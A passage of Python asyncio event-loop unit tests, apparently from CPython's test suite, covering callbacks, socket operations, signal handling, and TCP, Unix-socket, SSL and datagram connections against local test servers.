self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, bytearray()))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def _basetest_sock_recv_into(self, httpd, sock):
# same as _basetest_sock_client_ops, but using sock_recv_into
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = bytearray(1024)
with memoryview(data) as buf:
nbytes = self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[:1024]))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv_into(sock, buf[nbytes:]))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket()
self._basetest_sock_recv_into(httpd, sock)
@support.skip_unless_bind_unix_socket
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_recv_into(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
if (sys.platform == 'win32' and
